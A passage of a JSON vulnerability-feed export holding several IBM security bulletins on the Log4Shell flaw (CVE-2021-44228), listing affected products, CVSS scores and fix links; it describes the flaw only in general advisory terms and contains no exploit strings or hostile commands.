"https://www.ibm.com/support/pages/node/6526754", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:20", "description": "## Summary\n\nLog4j is used by IBM Spectrum Symphony for generating logs in some of its components. This bulletin provides patches for the Log4Shell vulnerability (CVE-2021-44228) to IBM Spectrum Symphony.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.2.0.2 \nIBM Spectrum Symphony| 7.2.1, 7.2.1.1 \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n## Remediation/Fixes\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| 7.2.0.2| \n\nP104504\n\nP104509\n\nP104522\n\nP104521\n\n| \n\n[sym-7.2.0.2-build600934](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600934&includeSupersedes=0> \"sym-7.2.0.2-build600934\" )\n\n[sym-7.2.0.2-build600939](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600939&includeSupersedes=0> \"sym-7.2.0.2-build600939\" )\n\n[sym-7.2.0.2-build600941](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600941&includeSupersedes=0> \"sym-7.2.0.2-build600941\" )\n\n[sym-7.2.0.2-build600944](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600944&includeSupersedes=0> \"sym-7.2.0.2-build600944\" ) \n \nIBM Spectrum Symphony| 7.2.1/7.2.1.1| \n\nP104505\n\nP104510\n\nP104524\n\nP104523\n\n| \n\n[sym-7.2.1-build600935](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600935&includeSupersedes=0> \"sym-7.2.1-build600935\" )\n\n[sym-7.2.1-build600940](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600940&includeSupersedes=0> \"sym-7.2.1-build600940\" )\n\n[sym-7.2.1-build600942](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600942&includeSupersedes=0> \"sym-7.2.1-build600942\" )\n\n[sym-7.2.1-build600945](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600945&includeSupersedes=0> \"sym-7.2.1-build600945\" ) \n \nIBM Spectrum Symphony| 7.3| \n\nP104506\n\nP104508\n\n| \n\n[sym-7.3-build600936](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600936&includeSupersedes=0> \"sym-7.3-build600936\" )\n\n[sym-7.3-build600943](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600943&includeSupersedes=0> \"sym-7.3-build600943\" ) \n \nIBM Spectrum Symphony| 7.3.1| P104507| [sym-7.3.1-build600937](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build600937&includeSupersedes=0> \"sym-7.3.1-build600937\" ) \nIBM Spectrum Symphony| 7.3.2| P104511| [sym-7.3.2-build600938](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build600938&includeSupersedes=0> \"sym-7.3.2-build600938\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZUMP\",\"label\":\"IBM Spectrum Symphony\"},\"Component\":\"GUI\\/PERF\\/ELK\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.3.1;7.3;7.2.1;7.2.0.2\",\"Edition\":\"7.3.1;7.3;7.2.1;7.2.0.2\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T15:43:37", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j addressed in IBM Spectrum Symphony", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-07T15:43:37", "id": "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "href": "https://www.ibm.com/support/pages/node/6526756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:44", "description": "## Summary\n\nA remote code execution vulnerability has been reported for log4j-core-2.x libraries, which are used in various components of IBM Cloud Pak for Business Automation.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nICP4A| \n\nV19.x \nV20.x \nV21.0.1 \nV21.0.2 before 21.0.2-IF006 \nV21.0.3 before 21.0.3-IF001 (in 21.0.3, only the ADP component is affected) \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nPlease follow this [IBM PSIRT blog post](<https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/> \"IBM PSIRT blog post\" ) to keep up to date with additional information around this vulnerability and how it relates to your IBM products.\n\nFor versions before 21.0.3, the recommended solution is to upgrade to\n\n * IBM Cloud Pak for Business Automation 21.0.2 and apply [IF006](<https://www.ibm.com/support/pages/node/6524920> \"IF006\" ) or later\n * IBM Cloud Pak for Business Automation 20.0.3 and apply [IF012](<https://www.ibm.com/support/pages/node/6539976> \"IF012\" ) or later\n\nas soon as possible. \n\nFor version 21.0.3, the recommended solution is to apply 21.0.3-IF001 or later as soon as possible, see Readme for [Cloud Pak for Business Automation 21.0.3-IF001 for ADP](<https://www.ibm.com/support/pages/node/6528012> \"Cloud Pak for Business Automation 21.0.3-IF001 for ADP\" ) for details.\n\nIBM Cloud Pak for Automation can make use of components in IBM Automation Foundation (IAF). Fixes for CVE-2021-44228 will be included in IAF 1.3.1. New installations of Cloud Pak for Automation 21.0.2-IF006 and later automatically consume the IBM Automation Foundation 1.3 channel. Existing installations upgrading to 21.0.2-IF006 or later need to manually update the IAF channel as in explained in [Readme for Cloud Pak for Business Automation 21.0.2 IF006](<https://www.ibm.com/support/pages/node/6524920> \"Readme for Cloud Pak for Business Automation 21.0.2 IF006\" ).\n\nIBM Cloud Pak for Automation allows building custom apps on top of the platform. These custom apps can bring their own copy of the vulnerable Log4j library. You must carefully review all your custom apps to identify and upgrade all vulnerable use of the log4j library.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication \n18 Dec 2021: added 21.0.3 (ADP component only) as affected \n15 Jan 2022: added 20.0.3-IF012 fix\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7JTW\",\"label\":\"IBM Cloud Pak for Automation\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"19.0.x, 20.0.x, 21.0.1, 21.0.2, 21.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T11:12:05", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Cloud Pak for Automation (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-15T11:12:05", "id": "55BBC53EEE4090294470AC417A4B8BDE9A26DF232DDD5FC327A46034AF09FE38", "href": "https://www.ibm.com/support/pages/node/6527848", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:49", "description": "## Summary\n\nApache Log4j, a dependency of ElasticSearch as used in IBM\u00ae Resilient SOAR, is vulnerable to information disclosure. Elastic Search is used by IBM\u00ae Resilient SOAR for text search. This bulletin provides a mitigation for the vulnerability. Customers are encouraged to update their systems now to address the vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nResilient OnPrem| IBM Security SOAR \n \n## Remediation/Fixes\n\n[IBM\u00ae Resilient SOAR v40](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Resilient+SOAR+Platform&release=40.2.73&platform=All&function=fixId&fixids=resilient-40.2.81.run&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM\u00ae Resilient SOAR v40\" )\n\n[IBM\u00ae Resilient SOAR v41](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Resilient+SOAR+Platform&release=40.2.73&platform=All&function=fixId&fixids=soar-41.2.41.run&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM\u00ae Resilient SOAR v41\" )\n\n[IBM\u00ae Resilient SOAR v42](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Resilient+SOAR+Platform&release=All&platform=All&function=fixId&fixids=soar-42.2.39.run&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM\u00ae Resilient SOAR v42\" )\n\n[IBM\u00ae Resilient SOAR v43](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Resilient+SOAR+Platform&release=All&platform=All&function=fixId&fixids=soar-43.0.7661.run&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM\u00ae Resilient SOAR v43\" )\n\nIf you are unable to update your IBM Security SOAR to one of the above versions please see the Workarounds and Mitigations below.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU008\",\"label\":\"Security\"},\"Product\":{\"code\":\"SSDVCX\",\"label\":\"IBM Resilient\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"40, 41, 42, 43\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T17:25:01", "type": "ibm", "title": "Security Bulletin: A dependency of ElasticSearch as used in IBM\u00ae Resilient SOAR is vulnerable to Apache Log4j (CVE-2021-44228).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T17:25:01", "id": "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "href": "https://www.ibm.com/support/pages/node/6529192", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:27", "description": "## Summary\n\nIBM Security Guardium Insights is vulnerable to a remote code execution vulnerability in Apache Log4j 2 component. IBM Security Guardium Insights has addressed the vulnerability (CVE-2021-44228) with an upgrade. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Security Guardium Insights| 3.0.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / Fix** \n \n---|---|--- \nIBM Security Guardium Insights| 3.0.2| | \n\n \nPlease download **v3.1 **<https://www.ibm.com/software/passportadvantage/>\n\n\\- refer to the **Release Notes** for details including install instructions \n \n--- \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMPHH\",\"label\":\"IBM Security Guardium\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"3.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T20:32:21", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium Insights is vulnerable to a remote code execution vulnerability in Apache Log4j 2 component. (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T20:32:21", "id": "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "href": "https://www.ibm.com/support/pages/node/6528432", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-11T06:01:59", "description": "## Summary\n\nIBM Content Navigator container deployments are vulnerable to a remote execution vulnerability. IBM Content Navigator has addressed the vulnerability as described below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Content Navigator| 3.0 Continuous Delivery \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nProduct| VMRF| Remediation / First Fix \n---|---|--- \nIBM Content Navigator| 3.0 Continuous Delivery| IBM Content Navigator container - ICN 3.0.9 LA 008, ICN 3.0.10 LA 004 / Task Manager container - TM 3.0.10 LA004, TM 3.0.9 LA008, 3.0.7 TM LA101. \n \n## Workarounds and Mitigations\n\nFor more information about how this vulnerability affects IBM Content Navigator, see this technote: <https://www.ibm.com/support/pages/node/6526164>\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SSEUEX\",\"label\":\"Content Navigator\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"3.0 Continuous Delivery\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB18\",\"label\":\"Miscellaneous LOB\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T18:34:30", "type": "ibm", "title": "Security Bulletin: IBM Content Navigator container deployments are vulnerable to a remote execution vulnerability (Log4j)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T18:34:30", "id": "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "href": "https://www.ibm.com/support/pages/node/6527946", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:43:19", "description": "## Summary\n\nIBM Sterling File Gateway is impacted by Log4Shell (CVE-2021-44228), through the use of Apache Log4j's JNDI logging feature. Final remediation images published below. As an alternative to the final remediation images, manual mitigation steps are also provided below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: 